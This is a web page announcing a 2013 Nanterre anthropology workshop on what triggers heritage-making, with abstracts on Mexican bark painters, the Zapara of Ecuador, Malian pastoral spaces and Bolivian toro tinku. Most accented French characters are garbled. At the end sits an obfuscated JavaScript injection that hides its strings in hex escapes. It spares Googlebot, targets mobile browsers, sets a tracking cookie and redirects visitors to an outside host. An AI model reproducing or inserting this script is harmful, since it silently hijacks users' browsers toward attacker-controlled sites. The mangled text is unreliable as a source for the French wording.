JOURNA�E D’A�TUDE FABRIQ’AM : Embrayeurs et patrimonialisation, le 17 octobre 2013, LESC-MAE, Nanterre

EMBRAYEURS ET MA�CANISMES D’A�MERGENCE DES PROCESSUS DE PATRIMONIALISATION

Atelier de Fabriqa��Am organisA� par Anne-GaA�l Bilhaut et Aline HA�mond

Jeudi 17 octobre, 10h-13h

Laboratoire da��Ethnologie et de Sociologie ComparativeA�- Salle 304

Maison Ethnologie et ArchA�ologie RenA�-GinouvA?s

21, allA�e de la��UniversitA�

UniversitA� Paris Ouest Nanterre

Quels sont les A�A�embrayeursA�A� des processus de patrimonialisation A� la��A�uvre sur nos terrainsA�? Dans une sociA�tA� donnA�e, A� quel moment et pourquoi des pratiques rituelles, des objets, des formes discursives, deviennent-ils des objets du patrimoine tel que dA�fini par les instances internationales, et la��UNESCO en particulierA�? Dans cet atelier, nous nous interrogerons sur les conditions (institutionnelles, politiques, sociales, locales et rA�gionalesa��) qui rendent possibles ces processus et essaierons de repA�rer quels sont les dA�clencheurs, moteurs, ou facilitateurs qui concourent A� la recherche et A� la mise en valeur du patrimoine indigA?ne des AmA�riques.

A partir des prA�sentations da��A�tudes de cas, nous tenterons de dA�finir provisoirement le terme A�A�embrayeurA�A� et de le caractA�riserA�: que recouvre-t-ilA�? Sa��agit-il da��un A�vA�nement, da��une personne ou da��une structure ressource, da��une interaction interculturelle dA�cisive, da��autre chose encore ? Qua��est-ce qui en relA?ve et comment dA�terminer que des mA�canismes de patrimonialisation sont des embrayeurs plutA?t que des A�lA�ments A�A�de la traditionA�A�, A�A�du commerceA�A�, de A�A�politique rA�gionale clientA�listeA�A�, etc.A�?

****

PROGRAMME

A�Programme en Pdf

Pour dA�battre de ces questions, trois communications longues puis une communication courte seront prA�sentA�es pour alimenter les A�changes.

10h00-10h10 – ouverture

10h10-10h40

Les embrayeurs des processus de patrimonialisationA�: la��exemple da��un barrage en rA�gion nahuaphone (sud-ouest du Mexique)

Aline HA�MOND -A�MaA�tre de ConfA�rence en Anthropologie, UniversitA� Paris 8 Saint-Denis, LAVUE-A�quipe AUS (Architecture, Urbanisme et sociA�tA�).

Le cas que je souhaiterais exposer fait la diffA�rence entre embrayeurs et passeurs. La��embrayeur de la dA�marche ici est un A�vA?nement, le dA�but de la construction d’un barrage hydro-A�lectrique, qui dA�clenche un mA�canisme de rA�sistance et de mobilisation, dont des actions de patrimoine. Il sa��agit du cas da��auto-ethnographie opA�rA� par les peintres sur papier da��A�corce (ouA�amatl) du Haut-Balsas. La patrimonialisation de leur art et de leur culture devient un projet rA�gional da��ensemble A� partir de leur lutte de protestation contre le barrage (1991-1995) et des nouveaux rapports politiques locaux qui sa��instaurent. Actuellement, les peintres et leursamatesA�sont mis A� la��honneur dans deux projets musA�aux post-coloniaux (Smithsoniana��s National Museum of American Indian, Whasington D.C.) et de mise en valeur de la culture A�A�mexicaineA�A�A� (National Museum of Mexican Art de la ville de Chicago). Sans exclure les acteurs qui ont mis en branle le cycle long de la patrimonialisation, je propose de A�A�jouer le jeuA�A� des embrayeurs, avec une relecture de mes donnA�es au travers de diffA�rentes thA�ories (notamment sur les mouvements sociaux et les mouvements da��opinions).

Discussion

10h40-11h10

De la langue au patrimoineA�: le processus de patrimonialisation chez les Zapara da��Equateur

Anne-GaA�l BilhautA�- associA�e au Centre EREA du LESC

Pour les Zapara da��Equateur, la proclamation par la��Unesco de leur culture orale comme Chef da��A�uvre du patrimoine orale et immatA�rielle de la��humanitA� en 2001 A�tait une reconnaissance du travail menA� depuis plusieurs annA�es par les communautA�s et la��organisation politique zapara. Pour exister politiquement, pour rA�clamer un territoire propre, pour bA�nA�ficier de soins de santA� et da��une A�cole, les Zapara ont dA�, dans les annA�es 90, sa��organiser. Leur premiA?re action a A�tA� de faire appel aux anciens, les derniers locuteurs de la langue, moins de 10 alors, pour enseigner aux plus jeunes le zapara. De nombreux projets de A�A�rA�cupA�rationA�A�, A�A�revalorisationA�A� ou A�A�sauvetageA�A� de la langue et de la culture zapara ont en effet prA�cA�dA� leur candidature A� la��Unesco. En revenant sur cesA� diffA�rentes actions, leurs motivations, implications, acteursa�� nous tenterons de saisir ce que pourrait A?tre, dans ce contexte prA�cis, la��A�A�A�embrayeurA�A� du processus de patrimonialisation.

Discussion

Pause

11h30-12h00

Entre sensibilitA� patrimoniale personnelle et politique culturelle nationale : des embrayeurs patrimoniaux aux frontiA?res floues

AnaA?s LeblonA�- MaA�tre de ConfA�rence en Anthropologie, UniversitA� Paris 8 Saint-Denis, LAVUE-A�quipe AUS (Architecture, Urbanisme et sociA�tA�).

La direction nationale du patrimoine culturel du Mali A�tant A� la��initiative de la��inscription de A�A�La��espace culturel du yaaral et du degalA�A� A� la liste des chefs-d’A�uvre du patrimoine oral et immatA�riel de la��HumanitA� de la��UNESCO, ca��est A� partir de la��examen des acteurs et des politiques patrimoniales de cette institution dA�pendante du ministA?re de la Culture malien que je tenterai de dA�celer quels ont pu A?tre les mA�canismes da��A�mergence de la patrimonialisation.A�Alors qu’aucune menace directe de disparition ne pA?se sur la pratique patrimonialisA�e, je verraiA�que la��A�A�embrayeurA�A� de la patrimonialisation semble A?tre la rencontre entre les orientations des politiques patrimoniales nationales dA�sirant promouvoir la diversitA� culturelle du pays, un contexte international favorable A� la reconnaissance du PCI et la��A�mergence de mouvements identitaires peuls. Je soulignerai A�galement qua��il ne faut pas sous-estimer la marge de manA�uvre individuelle dont bA�nA�ficient les acteurs A� la��intA�rieur mA?me de la��institution patrimoniale lors de la sA�lection des biens A� protA�ger. SensibilitA� patrimoniale personnelle, politique nationaliste et dA�sir de valorisation da��un territoire isolA� semblent en effet se conjuguer dans la valorisation patrimoniale de ces institutions pastorales du Delta intA�rieur du Niger.

Discussion

12h00-12h15

DuA�tinkuA�auA�toro tinkuA�dans le Nord-Potosi de Bolivie : un exemple d’ONG comme embrayeur

Laurence CharlierA�- Anthropologue associA�e au Cerma (Mondes AmA�ricains)

Je prA�sente une communication sur la transformation en Bolivie des combats rituels (tinku), oA? sa��affrontent des personnes issues de moitiA� opposA�es, en A� toro tinku A�, combats de taureaux. Les A�A�toro tinkuA�A� sont nA�s A� San Pedro de Buena vista puis se sont dA�veloppA�s dans toute la rA�gion du Nord Potosi sous la��impulsion des ONG. Les toro tinku sont aujourda��hui devenus de vA�ritables fA?tes patrimoniales.

Discussion

12h15-13h00

Autres brA?ves interventions des membres de Fabriqa��Am

Discussion gA�nA�rale

13h00

*******************

Bibliographie (en pdf)

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}